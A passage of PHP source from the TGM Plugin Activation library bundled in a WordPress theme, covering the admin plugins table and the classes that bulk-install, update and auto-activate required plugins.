		 * Create default title column along with the action links.
		 *
		 * @since 2.2.0
		 *
		 * @param array $item Array of item data.
		 * @return string The plugin name and action links.
		 */
		public function column_plugin( $item ) {
			return sprintf(
				'%1$s %2$s',
				$item['plugin'],
				$this->row_actions( $this->get_row_actions( $item ), true )
			);
		}

		/**
		 * Create version information column.
		 *
		 * @since 2.5.0
		 *
		 * @param array $item Array of item data.
		 * @return string HTML-formatted version information.
		 */
		public function column_version( $item ) {
			$output = array();

			if ( $this->tgmpa->is_plugin_installed( $item['slug'] ) ) {
				$installed = ! empty( $item['installed_version'] ) ? $item['installed_version'] : _x( 'unknown', 'as in: "version nr unknown"', 'maxbizz' );

				$color = '';
				if ( ! empty( $item['minimum_version'] ) && $this->tgmpa->does_plugin_require_update( $item['slug'] ) ) {
					$color = ' color: #ff0000; font-weight: bold;';
				}

				$output[] = sprintf(
					'<p><span style="min-width: 32px; text-align: right; float: right;%1$s">%2$s</span>' .esc_html__( 'Installed version:', 'maxbizz' ) . '</p>',
					$color,
					$installed
				);
			}

			if ( ! empty( $item['minimum_version'] ) ) {
				$output[] = sprintf(
					'<p><span style="min-width: 32px; text-align: right; float: right;">%1$s</span>' .esc_html__( 'Minimum required version:', 'maxbizz' ) . '</p>',
					$item['minimum_version']
				);
			}

			if ( ! empty( $item['available_version'] ) ) {
				$color = '';
				if ( ! empty( $item['minimum_version'] ) && version_compare( $item['available_version'], $item['minimum_version'], '>=' ) ) {
					$color = ' color: #71C671; font-weight: bold;';
				}

				$output[] = sprintf(
					'<p><span style="min-width: 32px; text-align: right; float: right;%1$s">%2$s</span>' .esc_html__( 'Available version:', 'maxbizz' ) . '</p>',
					$color,
					$item['available_version']
				);
			}

			if ( empty( $output ) ) {
				return '&nbsp;'; // Let's not break the table layout.
			} else {
				return implode( "\n", $output );
			}
		}

		/**
		 * Sets default message within the plugins table if no plugins
		 * are left for interaction.
		 *
		 * Hides the menu item to prevent the user from clicking and
		 * getting a permissions error.
		 *
		 * @since 2.2.0
		 */
		public function no_items() {
			echo esc_html__( 'No plugins to install, update or activate.', 'maxbizz' ) . ' <a href="' . esc_url( self_admin_url() ) . '"> ' . esc_html__( 'Return to the Dashboard', 'maxbizz' ) . '</a>';
			echo '<style type="text/css">#adminmenu .wp-submenu li.current { display: none !important; }</style>';
		}

		/**
		 * Output all the column information within the table.
		 *
		 * @since 2.2.0
		 *
		 * @return array $columns The column names.
		 */
		public function get_columns() {
			$columns = array(
				'cb'     => '<input type="checkbox" />',
				'plugin' =>esc_html__( 'Plugin', 'maxbizz' ),
				'source' =>esc_html__( 'Source', 'maxbizz' ),
				'type'   =>esc_html__( 'Type', 'maxbizz' ),
			);

			if ( 'all' === $this->view_context || 'update' === $this->view_context ) {
				$columns['version'] =esc_html__( 'Version', 'maxbizz' );
				$columns['status']  =esc_html__( 'Status', 'maxbizz' );
			}

			return apply_filters( 'tgmpa_table_columns', $columns );
		}

		/**
		 * Get name of default primary column
		 *
		 * @since 2.5.0 / WP 4.3+ compatibility
		 * @access protected
		 *
		 * @return string
		 */
		protected function get_default_primary_column_name() {
			return 'plugin';
		}

		/**
		 * Get the name of the primary column.
		 *
		 * @since 2.5.0 / WP 4.3+ compatibility
		 * @access protected
		 *
		 * @return string The name of the primary column.
		 */
		protected function get_primary_column_name() {
			if ( method_exists( 'WP_List_Table', 'get_primary_column_name' ) ) {
				return parent::get_primary_column_name();
			} else {
				return $this->get_default_primary_column_name();
			}
		}

		/**
		 * Get the actions which are relevant for a specific plugin row.
		 *
		 * @since 2.5.0
		 *
		 * @param array $item Array of item data.
		 * @return array Array with relevant action links.
		 */
		protected function get_row_actions( $item ) {
			$actions      = array();
			$action_links = array();

			// Display the 'Install' action link if the plugin is not yet available.
			if ( ! $this->tgmpa->is_plugin_installed( $item['slug'] ) ) {
				/* translators: %2$s: plugin name in screen reader markup */
				$actions['install'] = esc_html__( 'Install %2$s', 'maxbizz' );
			} else {
				// Display the 'Update' action link if an update is available and WP complies with plugin minimum.
				if ( false !== $this->tgmpa->does_plugin_have_update( $item['slug'] ) && $this->tgmpa->can_plugin_update( $item['slug'] ) ) {
					/* translators: %2$s: plugin name in screen reader markup */
					$actions['update'] = esc_html__( 'Update %2$s', 'maxbizz' );
				}

				// Display the 'Activate' action link, but only if the plugin meets the minimum version.
				if ( $this->tgmpa->can_plugin_activate( $item['slug'] ) ) {
					/* translators: %2$s: plugin name in screen reader markup */
					$actions['activate'] = esc_html__( 'Activate %2$s', 'maxbizz' );
				}
			}

			// Create the actual links.
			foreach ( $actions as $action => $text ) {
				$nonce_url = wp_nonce_url(
					add_query_arg(
						array(
							'plugin'           => urlencode( $item['slug'] ),
							'tgmpa-' . $action => $action . '-plugin',
						),
						$this->tgmpa->get_tgmpa_url()
					),
					'tgmpa-' . $action,
					'tgmpa-nonce'
				);

				$action_links[ $action ] = sprintf(
					'<a href="%1$s">' . esc_html( $text ) . '</a>', // $text contains the second placeholder.
					esc_url( $nonce_url ),
					'<span class="screen-reader-text">' . esc_html( $item['sanitized_plugin'] ) . '</span>'
				);
			}

			$prefix = ( defined( 'WP_NETWORK_ADMIN' ) && WP_NETWORK_ADMIN ) ? 'network_admin_' : '';
			return apply_filters( "tgmpa_{$prefix}plugin_action_links", array_filter( $action_links ), $item['slug'], $item, $this->view_context );
		}

		/**
		 * Generates content for a single row of the table.
		 *
		 * @since 2.5.0
		 *
		 * @param object $item The current item.
		 */
		public function single_row( $item ) {
			parent::single_row( $item );

			/**
			 * Fires after each specific row in the TGMPA Plugins list table.
			 *
			 * The dynamic portion of the hook name, `$item['slug']`, refers to the slug
			 * for the plugin.
			 *
			 * @since 2.5.0
			 */
			do_action( "tgmpa_after_plugin_row_{$item['slug']}", $item['slug'], $item, $this->view_context );
		}

		/**
		 * Show the upgrade notice below a plugin row if there is one.
		 *
		 * @since 2.5.0
		 *
		 * @see /wp-admin/includes/update.php
		 *
		 * @param string $slug Plugin slug.
		 * @param array  $item The information available in this table row.
		 * @return null Return early if upgrade notice is empty.
		 */
		public function wp_plugin_update_row( $slug, $item ) {
			if ( empty( $item['upgrade_notice'] ) ) {
				return;
			}

			echo '
				<tr class="plugin-update-tr">
					<td colspan="', absint( $this->get_column_count() ), '" class="plugin-update colspanchange">
						<div class="update-message">',
							esc_html__( 'Upgrade message from the plugin author:', 'maxbizz' ),
							' <strong>', wp_kses_data( $item['upgrade_notice'] ), '</strong>
						</div>
					</td>
				</tr>';
		}

		/**
		 * Extra controls to be displayed between bulk actions and pagination.
		 *
		 * @since 2.5.0
		 *
		 * @param string $which 'top' or 'bottom' table navigation.
		 */
		public function extra_tablenav( $which ) {
			if ( 'bottom' === $which ) {
				$this->tgmpa->show_tgmpa_version();
			}
		}

		/**
		 * Defines the bulk actions for handling registered plugins.
		 *
		 * @since 2.2.0
		 *
		 * @return array $actions The bulk actions for the plugin install table.
		 */
		public function get_bulk_actions() {

			$actions = array();

			if ( 'update' !== $this->view_context && 'activate' !== $this->view_context ) {
				if ( current_user_can( 'install_plugins' ) ) {
					$actions['tgmpa-bulk-install'] = esc_html__( 'Install', 'maxbizz' );
				}
			}

			if ( 'install' !== $this->view_context ) {
				if ( current_user_can( 'update_plugins' ) ) {
					$actions['tgmpa-bulk-update'] = esc_html__( 'Update', 'maxbizz' );
				}
				if ( current_user_can( 'activate_plugins' ) ) {
					$actions['tgmpa-bulk-activate'] = esc_html__( 'Activate', 'maxbizz' );
				}
			}

			return $actions;
		}

		/**
		 * Processes bulk installation and activation actions.
		 *
		 * The bulk installation process looks for the $_POST information and passes that
		 * through if a user has to use WP_Filesystem to enter their credentials.
		 *
		 * @since 2.2.0
		 */
		public function process_bulk_actions() {
			// Bulk installation process.
			if ( 'tgmpa-bulk-install' === $this->current_action() || 'tgmpa-bulk-update' === $this->current_action() ) {

				check_admin_referer( 'bulk-' . $this->_args['plural'] );

				$install_type = 'install';
				if ( 'tgmpa-bulk-update' === $this->current_action() ) {
					$install_type = 'update';
				}

				$plugins_to_install = array();

				// Did user actually select any plugins to install/update ?
				if ( empty( $_POST['plugin'] ) ) {
					if ( 'install' === $install_type ) {
						$message = esc_html__( 'No plugins were selected to be installed. No action taken.', 'maxbizz' );
					} else {
						$message = esc_html__( 'No plugins were selected to be updated. No action taken.', 'maxbizz' );
					}

					echo '<div id="message" class="error"><p>', esc_html( $message ), '</p></div>';

					return false;
				}

				if ( is_array( $_POST['plugin'] ) ) {
					$plugins_to_install = (array) $_POST['plugin'];
				} elseif ( is_string( $_POST['plugin'] ) ) {
					// Received via Filesystem page - un-flatten array (WP bug #19643).
					$plugins_to_install = explode( ',', $_POST['plugin'] );
				}

				// Sanitize the received input.
				$plugins_to_install = array_map( 'urldecode', $plugins_to_install );
				$plugins_to_install = array_map( array( $this->tgmpa, 'sanitize_key' ), $plugins_to_install );

				// Validate the received input.
				foreach ( $plugins_to_install as $key => $slug ) {
					// Check if the plugin was registered with TGMPA and remove if not.
					if ( ! isset( $this->tgmpa->plugins[ $slug ] ) ) {
						unset( $plugins_to_install[ $key ] );
						continue;
					}

					// For install: make sure this is a plugin we *can* install and not one already installed.
					if ( 'install' === $install_type && true === $this->tgmpa->is_plugin_installed( $slug ) ) {
						unset( $plugins_to_install[ $key ] );
					}

					// For updates: make sure this is a plugin we *can* update (update available and WP version ok).
					if ( 'update' === $install_type && false === $this->tgmpa->is_plugin_updatetable( $slug ) ) {
						unset( $plugins_to_install[ $key ] );
					}
				}

				// No need to proceed further if we have no plugins to handle.
				if ( empty( $plugins_to_install ) ) {
					if ( 'install' === $install_type ) {
						$message = esc_html__( 'No plugins are available to be installed at this time.', 'maxbizz' );
					} else {
						$message = esc_html__( 'No plugins are available to be updated at this time.', 'maxbizz' );
					}

					echo '<div id="message" class="error"><p>', esc_html( $message ), '</p></div>';

					return false;
				}

				// Pass all necessary information if WP_Filesystem is needed.
				$url = wp_nonce_url(
					$this->tgmpa->get_tgmpa_url(),
					'bulk-' . $this->_args['plural']
				);

				// Give validated data back to $_POST which is the only place the filesystem looks for extra fields.
				$_POST['plugin'] = implode( ',', $plugins_to_install ); // Work around for WP bug #19643.

				$method = ''; // Leave blank so WP_Filesystem can populate it as necessary.
				$fields = array_keys( $_POST ); // Extra fields to pass to WP_Filesystem.

				if ( false === ( $creds = request_filesystem_credentials( esc_url_raw( $url ), $method, false, false, $fields ) ) ) {
					return true; // Stop the normal page form from displaying, credential request form will be shown.
				}

				// Now we have some credentials, setup WP_Filesystem.
				if ( ! WP_Filesystem( $creds ) ) {
					// Our credentials were no good, ask the user for them again.
					request_filesystem_credentials( esc_url_raw( $url ), $method, true, false, $fields );

					return true;
				}

				/* If we arrive here, we have the filesystem */

				// Store all information in arrays since we are processing a bulk installation.
				$names      = array();
				$sources    = array(); // Needed for installs.
				$file_paths = array(); // Needed for upgrades.
				$to_inject  = array(); // Information to inject into the update_plugins transient.

				// Prepare the data for validated plugins for the install/upgrade.
				foreach ( $plugins_to_install as $slug ) {
					$name   = $this->tgmpa->plugins[ $slug ]['name'];
					$source = $this->tgmpa->get_download_url( $slug );

					if ( ! empty( $name ) && ! empty( $source ) ) {
						$names[] = $name;

						switch ( $install_type ) {

							case 'install':
								$sources[] = $source;
								break;

							case 'update':
								$file_paths[]                 = $this->tgmpa->plugins[ $slug ]['file_path'];
								$to_inject[ $slug ]           = $this->tgmpa->plugins[ $slug ];
								$to_inject[ $slug ]['source'] = $source;
								break;
						}
					}
				}
				unset( $slug, $name, $source );

				// Create a new instance of TGMPA_Bulk_Installer.
				$installer = new TGMPA_Bulk_Installer(
					new TGMPA_Bulk_Installer_Skin(
						array(
							'url'          => esc_url_raw( $this->tgmpa->get_tgmpa_url() ),
							'nonce'        => 'bulk-' . $this->_args['plural'],
							'names'        => $names,
							'install_type' => $install_type,
						)
					)
				);

				// Wrap the install process with the appropriate HTML.
				echo '<div class="tgmpa">',
					'<h2 style="font-size: 23px; font-weight: 400; line-height: 29px; margin: 0; padding: 9px 15px 4px 0;">', esc_html( get_admin_page_title() ), '</h2>
					<div class="update-php" style="width: 100%; height: 98%; min-height: 850px; padding-top: 1px;">';

				// Process the bulk installation submissions.
				add_filter( 'upgrader_source_selection', array( $this->tgmpa, 'maybe_adjust_source_dir' ), 1, 3 );

				if ( 'tgmpa-bulk-update' === $this->current_action() ) {
					// Inject our info into the update transient.
					$this->tgmpa->inject_update_info( $to_inject );

					$installer->bulk_upgrade( $file_paths );
				} else {
					$installer->bulk_install( $sources );
				}

				remove_filter( 'upgrader_source_selection', array( $this->tgmpa, 'maybe_adjust_source_dir' ), 1 );

				echo '</div></div>';

				return true;
			}

			// Bulk activation process.
			if ( 'tgmpa-bulk-activate' === $this->current_action() ) {
				check_admin_referer( 'bulk-' . $this->_args['plural'] );

				// Did user actually select any plugins to activate ?
				if ( empty( $_POST['plugin'] ) ) {
					echo '<div id="message" class="error"><p>', esc_html__( 'No plugins were selected to be activated. No action taken.', 'maxbizz' ), '</p></div>';

					return false;
				}

				// Grab plugin data from $_POST.
				$plugins = array();
				if ( isset( $_POST['plugin'] ) ) {
					$plugins = array_map( 'urldecode', (array) $_POST['plugin'] );
					$plugins = array_map( array( $this->tgmpa, 'sanitize_key' ), $plugins );
				}

				$plugins_to_activate = array();
				$plugin_names        = array();

				// Grab the file paths for the selected & inactive plugins from the registration array.
				foreach ( $plugins as $slug ) {
					if ( $this->tgmpa->can_plugin_activate( $slug ) ) {
						$plugins_to_activate[] = $this->tgmpa->plugins[ $slug ]['file_path'];
						$plugin_names[]        = $this->tgmpa->plugins[ $slug ]['name'];
					}
				}
				unset( $slug );

				// Return early if there are no plugins to activate.
				if ( empty( $plugins_to_activate ) ) {
					echo '<div id="message" class="error"><p>', esc_html__( 'No plugins are available to be activated at this time.', 'maxbizz' ), '</p></div>';

					return false;
				}

				// Now we are good to go - let's start activating plugins.
				$activate = activate_plugins( $plugins_to_activate );

				if ( is_wp_error( $activate ) ) {
					echo '<div id="message" class="error"><p>', wp_kses_post( $activate->get_error_message() ), '</p></div>';
				} else {
					$count        = count( $plugin_names ); // Count so we can use _n function.
					$plugin_names = array_map( array( 'TGMPA_Utils', 'wrap_in_strong' ), $plugin_names );
					$last_plugin  = array_pop( $plugin_names ); // Pop off last name to prep for readability.
					$imploded     = empty( $plugin_names ) ? $last_plugin : ( implode( ', ', $plugin_names ) . ' ' . esc_html_x( 'and', 'plugin A *and* plugin B', 'maxbizz' ) . ' ' . $last_plugin );

					printf( // WPCS: xss ok.
						'<div id="message" class="updated"><p>%1$s %2$s.</p></div>',
						esc_html( _n( 'The following plugin was activated successfully:', 'The following plugins were activated successfully:', $count, 'maxbizz' ) ),
						$imploded
					);

					// Update recently activated plugins option.
					$recent = (array) get_option( 'recently_activated' );
					foreach ( $plugins_to_activate as $plugin => $time ) {
						if ( isset( $recent[ $plugin ] ) ) {
							unset( $recent[ $plugin ] );
						}
					}
					update_option( 'recently_activated', $recent );
				}

				unset( $_POST ); // Reset the $_POST variable in case user wants to perform one action after another.

				return true;
			}

			return false;
		}

		/**
		 * Prepares all of our information to be outputted into a usable table.
		 *
		 * @since 2.2.0
		 */
		public function prepare_items() {
			$columns               = $this->get_columns(); // Get all necessary column information.
			$hidden                = array(); // No columns to hide, but we must set as an array.
			$sortable              = array(); // No reason to make sortable columns.
			$primary               = $this->get_primary_column_name(); // Column which has the row actions.
			$this->_column_headers = array( $columns, $hidden, $sortable, $primary ); // Get all necessary column headers.

			// Process our bulk activations here.
			if ( 'tgmpa-bulk-activate' === $this->current_action() ) {
				$this->process_bulk_actions();
			}

			// Store all of our plugin data into $items array so WP_List_Table can use it.
			$this->items = apply_filters( 'tgmpa_table_data_items', $this->_gather_plugin_data() );
		}

		/* *********** DEPRECATED METHODS *********** */

		/**
		 * Retrieve plugin data, given the plugin name.
		 *
		 * @since      2.2.0
		 * @deprecated 2.5.0 use {@see TGM_Plugin_Activation::_get_plugin_data_from_name()} instead.
		 * @see        TGM_Plugin_Activation::_get_plugin_data_from_name()
		 *
		 * @param string $name Name of the plugin, as it was registered.
		 * @param string $data Optional. Array key of plugin data to return. Default is slug.
		 * @return string|boolean Plugin slug if found, false otherwise.
		 */
		protected function _get_plugin_data_from_name( $name, $data = 'slug' ) {
			_deprecated_function( __FUNCTION__, 'TGMPA 2.5.0', 'TGM_Plugin_Activation::_get_plugin_data_from_name()' );

			return $this->tgmpa->_get_plugin_data_from_name( $name, $data );
		}
	}
}


if ( ! class_exists( 'TGM_Bulk_Installer' ) ) {

	/**
	 * Hack: Prevent TGMPA v2.4.1- bulk installer class from being loaded if 2.4.1- is loaded after 2.5+.
	 *
	 * @since 2.5.2
	 *
	 * {@internal The TGMPA_Bulk_Installer class was originally called TGM_Bulk_Installer.
	 *            For more information, see that class.}}
	 */
	class TGM_Bulk_Installer {
	}
}
if ( ! class_exists( 'TGM_Bulk_Installer_Skin' ) ) {

	/**
	 * Hack: Prevent TGMPA v2.4.1- bulk installer skin class from being loaded if 2.4.1- is loaded after 2.5+.
	 *
	 * @since 2.5.2
	 *
	 * {@internal The TGMPA_Bulk_Installer_Skin class was originally called TGM_Bulk_Installer_Skin.
	 *            For more information, see that class.}}
	 */
	class TGM_Bulk_Installer_Skin {
	}
}

/**
 * The WP_Upgrader file isn't always available. If it isn't available,
 * we load it here.
 *
 * We check to make sure no action or activation keys are set so that WordPress
 * does not try to re-include the class when processing upgrades or installs outside
 * of the class.
 *
 * @since 2.2.0
 */
add_action( 'admin_init', 'tgmpa_load_bulk_installer' );
if ( ! function_exists( 'tgmpa_load_bulk_installer' ) ) {
	/**
	 * Load bulk installer
	 */
	function tgmpa_load_bulk_installer() {
		// Silently fail if 2.5+ is loaded *after* an older version.
		if ( ! isset( $GLOBALS['tgmpa'] ) ) {
			return;
		}

		// Get TGMPA class instance.
		$tgmpa_instance = call_user_func( array( get_class( $GLOBALS['tgmpa'] ), 'get_instance' ) );

		if ( isset( $_GET['page'] ) && $tgmpa_instance->menu === $_GET['page'] ) {
			if ( ! class_exists( 'Plugin_Upgrader', false ) ) {
				require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
			}

			if ( ! class_exists( 'TGMPA_Bulk_Installer' ) ) {

				/**
				 * Installer class to handle bulk plugin installations.
				 *
				 * Extends WP_Upgrader and customizes to suit the installation of multiple
				 * plugins.
				 *
				 * @since 2.2.0
				 *
				 * {@internal Since 2.5.0 the class is an extension of Plugin_Upgrader rather than WP_Upgrader.}}
				 * {@internal Since 2.5.2 the class has been renamed from TGM_Bulk_Installer to TGMPA_Bulk_Installer.
				 *            This was done to prevent backward compatibility issues with v2.3.6.}}
				 *
				 * @package TGM-Plugin-Activation
				 * @author  Thomas Griffin
				 * @author  Gary Jones
				 */
				class TGMPA_Bulk_Installer extends Plugin_Upgrader {
					/**
					 * Holds result of bulk plugin installation.
					 *
					 * @since 2.2.0
					 *
					 * @var string
					 */
					public $result;

					/**
					 * Flag to check if bulk installation is occurring or not.
					 *
					 * @since 2.2.0
					 *
					 * @var boolean
					 */
					public $bulk = false;

					/**
					 * TGMPA instance
					 *
					 * @since 2.5.0
					 *
					 * @var object
					 */
					protected $tgmpa;

					/**
					 * Whether or not the destination directory needs to be cleared ( = on update).
					 *
					 * @since 2.5.0
					 *
					 * @var bool
					 */
					protected $clear_destination = false;

					/**
					 * References parent constructor and sets defaults for class.
					 *
					 * @since 2.2.0
					 *
					 * @param \Bulk_Upgrader_Skin|null $skin Installer skin.
					 */
					public function __construct( $skin = null ) {
						// Get TGMPA class instance.
						$this->tgmpa = call_user_func( array( get_class( $GLOBALS['tgmpa'] ), 'get_instance' ) );

						parent::__construct( $skin );

						if ( isset( $this->skin->options['install_type'] ) && 'update' === $this->skin->options['install_type'] ) {
							$this->clear_destination = true;
						}

						if ( $this->tgmpa->is_automatic ) {
							$this->activate_strings();
						}

						add_action( 'upgrader_process_complete', array( $this->tgmpa, 'populate_file_path' ) );
					}

					/**
					 * Sets the correct activation strings for the installer skin to use.
					 *
					 * @since 2.2.0
					 */
					public function activate_strings() {
						$this->strings['activation_failed']  = esc_html__( 'Plugin activation failed.', 'maxbizz' );
						$this->strings['activation_success'] = esc_html__( 'Plugin activated successfully.', 'maxbizz' );
					}

					/**
					 * Performs the actual installation of each plugin.
					 *
					 * @since 2.2.0
					 *
					 * @see WP_Upgrader::run()
					 *
					 * @param array $options The installation config options.
					 * @return null|array Return early if error, array of installation data on success.
					 */
					public function run( $options ) {
						$result = parent::run( $options );

						// Reset the strings in case we changed one during automatic activation.
						if ( $this->tgmpa->is_automatic ) {
							if ( 'update' === $this->skin->options['install_type'] ) {
								$this->upgrade_strings();
							} else {
								$this->install_strings();
							}
						}

						return $result;
					}

					/**
					 * Processes the bulk installation of plugins.
					 *
					 * @since 2.2.0
					 *
					 * {@internal This is basically a near identical copy of the WP Core
					 * Plugin_Upgrader::bulk_upgrade() method, with minor adjustments to deal with
					 * new installs instead of upgrades.
					 * For ease of future synchronizations, the adjustments are clearly commented, but no other
					 * comments are added. Code style has been made to comply.}}
					 *
					 * @see Plugin_Upgrader::bulk_upgrade()
					 * @see https://core.trac.wordpress.org/browser/tags/4.2.1/src/wp-admin/includes/class-wp-upgrader.php#L838
					 * (@internal Last synced: Dec 31st 2015 against https://core.trac.wordpress.org/browser/trunk?rev=36134}}
					 *
					 * @param array $plugins The plugin sources needed for installation.
					 * @param array $args    Arbitrary passed extra arguments.
					 * @return array|false   Install confirmation messages on success, false on failure.
					 */
					public function bulk_install( $plugins, $args = array() ) {
						// [TGMPA + ] Hook auto-activation in.
						add_filter( 'upgrader_post_install', array( $this, 'auto_activate' ), 10 );

						$defaults    = array(
							'clear_update_cache' => true,
						);
						$parsed_args = wp_parse_args( $args, $defaults );

						$this->init();
						$this->bulk = true;

						$this->install_strings(); // [TGMPA + ] adjusted.

						/* [TGMPA - ] $current = get_site_transient( 'update_plugins' ); */

						/* [TGMPA - ] add_filter('upgrader_clear_destination', array($this, 'delete_old_plugin'), 10, 4); */

						$this->skin->header();

						// Connect to the Filesystem first.
						$res = $this->fs_connect( array( WP_CONTENT_DIR, WP_PLUGIN_DIR ) );
						if ( ! $res ) {
							$this->skin->footer();
							return false;
						}

						$this->skin->bulk_header();

						/*
						 * Only start maintenance mode if:
						 * - running Multisite and there are one or more plugins specified, OR
						 * - a plugin with an update available is currently active.
						 * @TODO: For multisite, maintenance mode should only kick in for individual sites if at all possible.
						 */
						$maintenance = ( is_multisite() && ! empty( $plugins ) );

						/*
						[TGMPA - ]
						foreach ( $plugins as $plugin )
							$maintenance = $maintenance || ( is_plugin_active( $plugin ) && isset( $current->response[ $plugin] ) );
						*/
						if ( $maintenance ) {
							$this->maintenance_mode( true );
						}

						$results = array();

						$this->update_count   = count( $plugins );
						$this->update_current = 0;
						foreach ( $plugins as $plugin ) {
							$this->update_current++;

							/*
							[TGMPA - ]
							$this->skin->plugin_info = get_plugin_data( WP_PLUGIN_DIR . '/' . $plugin, false, true);

							if ( !isset( $current->response[ $plugin ] ) ) {
								$this->skin->set_result('up_to_date');
								$this->skin->before();
								$this->skin->feedback('up_to_date');
								$this->skin->after();
								$results[$plugin] = true;
								continue;
							}

							// Get the URL to the zip file.
							$r = $current->response[ $plugin ];

							$this->skin->plugin_active = is_plugin_active($plugin);
							*/

							$result = $this->run(
								array(
									'package'           => $plugin, // [TGMPA + ] adjusted.
									'destination'       => WP_PLUGIN_DIR,
									'clear_destination' => false, // [TGMPA + ] adjusted.
									'clear_working'     => true,
									'is_multi'          => true,
									'hook_extra'        => array(
										'plugin' => $plugin,
									),
								)
							);

							$results[ $plugin ] = $this->result;

							// Prevent credentials auth screen from displaying multiple times.
							if ( false === $result ) {
								break;
							}
						} //end foreach $plugins

						$this->maintenance_mode( false );

						/**
						 * Fires when the bulk upgrader process is complete.
						 *
						 * @since WP 3.6.0 / TGMPA 2.5.0
						 *
						 * @param Plugin_Upgrader $this Plugin_Upgrader instance. In other contexts, $this, might
						 *                              be a Theme_Upgrader or Core_Upgrade instance.
						 * @param array           $data {
						 *     Array of bulk item update data.
						 *
						 *     @type string $action   Type of action. Default 'update'.
						 *     @type string $type     Type of update process. Accepts 'plugin', 'theme', or 'core'.
						 *     @type bool   $bulk     Whether the update process is a bulk update. Default true.
						 *     @type array  $packages Array of plugin, theme, or core packages to update.
						 * }
						 */
						do_action( 'upgrader_process_complete', $this, array(
							'action'  => 'install', // [TGMPA + ] adjusted.
							'type'    => 'plugin',
							'bulk'    => true,
							'plugins' => $plugins,
						) );

						$this->skin->bulk_footer();

						$this->skin->footer();

						// Cleanup our hooks, in case something else does a upgrade on this connection.
						/* [TGMPA - ] remove_filter('upgrader_clear_destination', array($this, 'delete_old_plugin')); */

						// [TGMPA + ] Remove our auto-activation hook.
						remove_filter( 'upgrader_post_install', array( $this, 'auto_activate' ), 10 );

						// Force refresh of plugin update information.
						wp_clean_plugins_cache( $parsed_args['clear_update_cache'] );

						return $results;
					}

					/**
					 * Handle a bulk upgrade request.
					 *
					 * @since 2.5.0
					 *
					 * @see Plugin_Upgrader::bulk_upgrade()
					 *
					 * @param array $plugins The local WP file_path's of the plugins which should be upgraded.
					 * @param array $args    Arbitrary passed extra arguments.
					 * @return string|bool Install confirmation messages on success, false on failure.
					 */
					public function bulk_upgrade( $plugins, $args = array() ) {

						add_filter( 'upgrader_post_install', array( $this, 'auto_activate' ), 10 );

						$result = parent::bulk_upgrade( $plugins, $args );

						remove_filter( 'upgrader_post_install', array( $this, 'auto_activate' ), 10 );

						return $result;
					}

					/**
					 * Abuse a filter to auto-activate plugins after installation.
					 *
					 * Hooked into the 'upgrader_post_install' filter hook.
					 *
					 * @since 2.5.0
					 *
					 * @param bool $bool The value we need to give back (true).
					 * @return bool
					 */
					public function auto_activate( $bool ) {
						// Only process the activation of installed plugins if the automatic flag is set to true.
						if ( $this->tgmpa->is_automatic ) {
							// Flush plugins cache so the headers of the newly installed plugins will be read correctly.
							wp_clean_plugins_cache();

							// Get the installed plugin file.
							$plugin_info = $this->plugin_info();

							// Don't try to activate on upgrade of active plugin as WP will do this already.
							if ( ! is_plugin_active( $plugin_info ) ) {
								$activate = activate_plugin( $plugin_info );

								// Adjust the success string based on the activation result.
								$this->strings['process_success'] = $this->strings['process_success'] . "<br />\n";

								if ( is_wp_error( $activate ) ) {
									$this->skin->error( $activate );
									$this->strings['process_success'] .= $this->strings['activation_failed'];
								} else {
									$this->strings['process_success'] .= $this->strings['activation_success'];
								}
							}
						}

						return $bool;
					}
				}
			}

			if ( ! class_exists( 'TGMPA_Bulk_Installer_Skin' ) ) {

				/**
				 * Installer skin to set strings for the bulk plugin installations..
				 *
				 * Extends Bulk_Upgrader_Skin and customizes to suit the installation of multiple
				 * plugins.
				 *
				 * @since 2.2.0
				 *
				 * {@internal Since 2.5.2 the class has been renamed from TGM_Bulk_Installer_Skin to
				 *            TGMPA_Bulk_Installer_Skin.
				 *            This was done to prevent backward compatibility issues with v2.3.6.}}
				 *
				 * @see https://core.trac.wordpress.org/browser/trunk/src/wp-admin/includes/class-wp-upgrader-skins.php
				 *
				 * @package TGM-Plugin-Activation
				 * @author  Thomas Griffin
				 * @author  Gary Jones
				 */
				class TGMPA_Bulk_Installer_Skin extends Bulk_Upgrader_Skin {
					/**
					 * Holds plugin info for each individual plugin installation.
					 *
					 * @since 2.2.0
					 *
					 * @var array
					 */
					public $plugin_info = array();

					/**
					 * Holds names of plugins that are undergoing bulk installations.
					 *
					 * @since 2.2.0
					 *
					 * @var array
					 */
					public $plugin_names = array();

					/**
					 * Integer to use for iteration through each plugin installation.
					 *
					 * @since 2.2.0
					 *
					 * @var integer
					 */
					public $i = 0;

					/**
					 * TGMPA instance
					 *
					 * @since 2.5.0
					 *
					 * @var object
					 */
					protected $tgmpa;

					/**
					 * Constructor. Parses default args with new ones and extracts them for use.
					 *
					 * @since 2.2.0
					 *
					 * @param array $args Arguments to pass for use within the class.
					 */
					public function __construct( $args = array() ) {
						// Get TGMPA class instance.
						$this->tgmpa = call_user_func( array( get_class( $GLOBALS['tgmpa'] ), 'get_instance' ) );

						// Parse default and new args.
						$defaults = array(
							'url'          => '',
							'nonce'        => '',
							'names'        => array(),
							'install_type' => 'install',
						);
						$args     = wp_parse_args( $args, $defaults );

						// Set plugin names to $this->plugin_names property.
						$this->plugin_names = $args['names'];

						// Extract the new args.
						parent::__construct( $args );
					}

					/**
					 * Sets install skin strings for each individual plugin.
					 *
					 * Checks to see if the automatic activation flag is set and uses the
					 * the proper strings accordingly.
					 *
					 * @since 2.2.0
					 */
					public function add_strings() {
						if ( 'update' === $this->options['install_type'] ) {
							parent::add_strings();
							/* translators: 1: plugin name, 2: action number 3: total number of actions. */
							$this->upgrader->strings['skin_before_update_header'] =esc_html__( 'Updating Plugin %1$s (%2$d/%3$d)', 'maxbizz' );
						} else {
							/* translators: 1: plugin name, 2: error message. */
							$this->upgrader->strings['skin_update_failed_error'] =esc_html__( 'An error occurred while installing %1$s: <strong>%2$s</strong>.', 'maxbizz' );
							/* translators: 1: plugin name. */
							$this->upgrader->strings['skin_update_failed'] =esc_html__( 'The installation of %1$s failed.', 'maxbizz' );

							if ( $this->tgmpa->is_automatic ) {
								// Automatic activation strings.
								$this->upgrader->strings['skin_upgrade_start'] =esc_html__( 'The installation and activation process is starting. This process may take a while on some hosts, so please be patient.', 'maxbizz' );
								/* translators: 1: plugin name. */
								$this->upgrader->strings['skin_update_successful'] =esc_html__( '%1$s installed and activated successfully.', 'maxbizz' );
								$this->upgrader->strings['skin_upgrade_end']       =esc_html__( 'All installations and activations have been completed.', 'maxbizz' );
								/* translators: 1: plugin name, 2: action number 3: total number of actions. */
